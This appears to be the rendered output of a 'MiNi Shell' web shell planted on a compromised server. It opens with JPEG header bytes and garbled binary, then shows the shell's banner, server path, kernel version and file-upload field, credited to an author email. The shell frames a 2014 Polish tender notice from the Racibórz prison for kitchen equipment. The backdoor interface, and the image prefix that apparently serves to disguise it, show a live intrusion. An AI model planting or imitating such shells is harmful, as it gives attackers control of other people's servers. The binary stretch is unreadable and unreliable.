JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140624/211516-N-2014.html

<p class="kh_header"><b>Racibórz: Przetarg nieograniczony o wartości szacunkowej zamówienia mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust.8 ustawy z  dnia 29 stycznia 2004r  Prawo zamówień publicznych na dostawę sprzętu kuchennego</b><br>
<b>Numer ogłoszenia: 211516 - 2014; data zamieszczenia: 24.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Eichendorffa 14, 47-400 Racibórz, woj. śląskie, tel. 032 4539600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadajaca osobowości prawnej: zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony o wartości szacunkowej zamówienia mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust.8 ustawy z  dnia 29 stycznia 2004r  Prawo zamówień publicznych na dostawę sprzętu kuchennego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> grupa I
1
chochla
- 500 ml
- monoblok
- wykonana ze stali nierdzewnej 18/10 wysoko polerowanej
- uchwyt satynowy,
-  pojemność wytłoczona na uchwycie, 
- bardzo sztywna, 
- uchwyt zakończony hakiem umożliwiającym zawieszenie
- zgodna z normami HACCP
ilość: 12 szt.

2
Termos transportowy z pokrywą  walizkowy GN 1/1 200
- przeznaczony do przewozu pojemników z gorącymi lub zimnymi potrawami
- wykonany z wytrzymałego  polietylenu z grubą izolacją z pianki poliuretanowej odpornego na uszkodzenia
- wyposażony w  uchwyty do przenoszenia
- przeznaczony do przewozu posiłków w pojemnikach GN stalowych, poliwęglanowych lub polipropylenowych
- pokrywa zamykana na cztery klamry
- wentyl odpowietrzający 
- wsad GN 1/1 o wysokości 200 mm
- max. temp. wsadu 90°C
pojemność GN 1/1 200 mm
- można piętrować
ilość: 4 szt.

3
Pojemnik gastronomiczny GN 1/3 200
- przystosowany do pieców konwekcyjno-parowych
- wykonany ze stali nierdzewnej
- bez uchwytów
- wzmocnione krawędzie
-  zgodny z normami HACCP
- pojemność 7,3 l (325x176x200mm)
ilośc: 3 szt.
4
Pojemnik gastronomiczny GN 1/6 200
- przystosowany do pieców konwekcyjno-parowych
- wykonany ze stali nierdzewnej
- bez uchwytów
- wzmocnione krawędzie
-  zgodny z normami HACCP
- pojemność 2,8l (162x176x200mm)
ilośc: 12 szt.

5
Pojemnik gastronomiczny GN     1/4  200
- przystosowany do pieców konwekcyjno-parowych
- wykonany ze stali nierdzewnej
- bez uchwytów
- wzmocnione krawędzie
-  zgodny z normami HACCP
- pojemność 5 l (162x265x200mm)
ilość: 8 szt.

6
Pokrywa z uszczelką GN 1/3
Pokrywa z uszczelką silikonową wykonana ze stali nierdzewnej posiada otwór eliminujący podciśnienie, kolor: inox, brak wycięcia na uchwyty
ilość: 3 szt.

7
Pokrywa z uszczelką GN 1/6
Pokrywa z uszczelką silikonową wykonana ze stali nierdzewnej posiada otwór eliminujący podciśnienie, kolor: inox, brak wycięcia na uchwyty
ilośc: 12 szt .

8
Pokrywa z uszczelką GN 1/4
Pokrywa z uszczelką silikonową wykonana ze stali nierdzewnej posiada otwór eliminujący podciśnienie, kolor: inox, brak wycięcia na uchwyty
ilośc: 8 szt.
9
Rękawice 
- termiczne olejoodporne 
- temp do 300 st. C
- pięciopalczaste
- wzmacniany, bezpieczny mankiet
- elastyczne, o dobrej odporności mechanicznej
- nieprzepuszczalne
-  powierzchnia umożliwiająca dobry chwyt
- wykonane z neoprenu
ilość: 1 para
10
Wózek transportowy do termosów 
Wózek do termosów transportowych na żywność przystosowanych do pojemników GN,
wyposażony w 4 obrotowe kółka o średnicy 10 cm
ilośc: 1 szt

Termos stalowy 10l
-wykonany ze stali nierdzewnej
- podwójne ścianki izolowane pianką
- bez kranu
- podwójna pokrywa z uszczelka silikonową
- wentyl odpowietrzający
- podstawa z tworzywa zabezpieczająca termos przed uszkodzeniami mechanicznymi
- pojemność 10 l
- 6 zatrzasków zamykających
- uchwyty transportowe
ilośc: 1szt.
12
Termos 50l
-wykonany ze stali nierdzewnej
- podwójne ścianki izolowane pianką
- bez kranu
- podwójna pokrywa z uszczelka silikonową
- wentyl odpowietrzający
- podstawa z tworzywa zabezpieczająca termos przed uszkodzeniami mechanicznymi
- pojemność 50 l
- 6 zatrzasków zamykających
- uchwyty transportowe
ilośc: 10szt.

13
Termos stalowy 5l TM
Wykonany ze stali nierdzewnej; 
3 regulowane klamry umożliwiające idealne dopasowanie się pokrywy; odpowietrznik w pokrywie
uchwyt umożliwiający transport
zgodny z normami HACCP
ilośc: 4szt.

14
Wiadro izolowane z pokrywką  i uchwytem - pojemność 2l
Wykonane ze stali nierdzewnej polerowanej 18/10, podwójne ścianki, izolowane, o właściwościach termoizolacyjnych
zgodna z normami HACCP
ilośc 5 szt.

15
Termos stalowy 30l
-wykonany ze stali nierdzewnej
- podwójne ścianki izolowane pianką
- bez kranu
- podwójna pokrywa z uszczelka silikonową
- wentyl odpowietrzający
- podstawa z tworzywa zabezpieczająca termos przed uszkodzeniami mechanicznymi
- pojemność 30 l
- zatrzaski zamykające
- uchwyty transportowe
ilość 2 szt.

16
Termometr elektroniczny z sondą stalową (szpikulcem)
Przeznaczony do pomiaru  temperatury ciał stałych i cieczy, zakres pracy od -50 do +300 st. C
Dokładność pomiaru+ - 1 stopień C (w zakresie do +80 st. C,) zasilanie bateryjne (bateria załączona), funkcja automatycznego wyłączania termometru po max 15 min okresie bezczynności, pamięć ostatniego pomiaru ; długość sondy pomiarowej (szpikulca) ok. 11 cm; wzorcowany
2 szt.

17
Pojemniki do jaj po naświetlaniu

- pojemnik na jajka z 8 tacami 
- pojemniki wykonane z materiału zapewniającego maksymalną odporność na uderzenia, wgniecenia i temperaturę
- 1 komplet składa się z  8 tac z pojemnikiem (4 tace w pojemniku i 4 tace na zmianę)
- pojemność jednej tacy- 30 jaj
ilość 10 kpl.

grupa II
1
Waga elektroniczna 
- udźwig 60 kg
- waga o konstrukcji stalowej z szalką ze stali nierdzewnej
- wyświetlacz LCD
- pomostowa
- działka odczytowa 20g
- wbudowany akumulator
- zasilanie 230V
- z legalizacją
ilość1 szt
2
Waga elektroniczna
- udźwig 30kg
- dokładność do 5g
- duży wyświetlacz
- zasilanie 230V (zewnętrzny zasilacz- w zestawie) lub wbudowany akumulator ładowany z sieci
- szalka z tworzywa
- z legalizacją
- obciążenie minimalne 100g
ilość: 1 szt

grupa III
1
Szafa chłodnicza jednokomorowa
- pojemność 600l
- biała obudowa malowana proszkowo
- wbudowany zamek na klucz
- elektroniczny wyświetlacz temperatury
- możliwość regulacji temperatury
- automatyczne odszranianie
- wymuszony obieg powietrza
- zakres temperatur : 0 -10 st. C
- zasilanie 230 V
- min. 3 półki
ilość: 1 szt
2
Lodówka na próbki żywności 
- do przechowywania próbek żywności
- budowa chłodziarki dostosowana do wymogów ustawy z dnia 11-05-2001r o warunkach zdrowotnych żywności i żywienia oraz przepisów wykonawczych do w/w ustawy
- drzwi chłodziarki zamykane na klucz
- obudowa z blachy proszkowej malowanej na biało
- wyposażona w  9 kaset zbiorczych z pojemnikami jednostkowymi na poszczególne posiłki(8 pojemników w każdej kasecie)
ilość: 1 szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.22.10.00-7, 39.22.11.50-3, 39.31.40.00-6, 18.14.10.00-0, 39.31.40.00-9, 39.31.40.00-6, 42.92.32.10-7, 39.71.11.30-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa łączną wartość  wadium na kwotę  480 zł tj. grupa I  370,00zł , grupa II  30,00 zł, grupa III  80,00 zł
(Formy wnoszenia wadium-zgodnie z art. 45.1 pkt. 6 ustawy pzp)
Wadium w formie pieniężnej należy wnosić na konto zamawiającego przed upływem terminu składania ofert tj. do dnia 15-07-2014r do godziny 9:30
Nazwa i numer konta:
Zakład Karny w Raciborzu
ul. Józefa von Eichendorffa 14
 47-400 Racibórz
Konto: NBP OKatowice
Nr 92 1010 1212 3061 0213 9120 0000 z dopiskiem  WADIUM NA DOSTAWĘ  SPRZĄTU KUCHENNEGO grupa nr .......... 
 Zamawiający uzna , że termin wpłaty wadium został dotrzymany,jeżeli przed upływem terminu składania ofert zostało uznane konto zamawiającego. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
Wadium wniesione w formie pieniężnej Zamawiający przechowuje na nieoprocentowanym rachunku bankowym.
Wadium wnoszone w formie innej niż pieniężna  należy zdeponować w kasie zamawiającego przed upływem terminu składania ofert tj. do dnia 15-07-2014r do godziny 9:30 . Do oferty należy dołączyć dokument potwierdzający wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonych dokumentów i oświadczen określonych w rozdziale 5 i 6 SIWZ, zgodnie z kryterium: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonych dokumentów i oświadczen określonych w rozdziale 5 i 6 SIWZ, zgodnie z kryterium: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonych dokumentów i oświadczen określonych w rozdziale 5 i 6 SIWZ, zgodnie z kryterium: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonych dokumentów i oświadczen określonych w rozdziale 5 i 6 SIWZ, zgodnie z kryterium: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złozonych dokumentów i oświadczen określonych w rozdziale 5 i 6 SIWZ, zgodnie z kryterium: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny ul. Eichendorffa 14, 47-400 Racibórz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2014 godzina 09:30, miejsce: sekretariat Zakladu Karnego w Raciborzu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com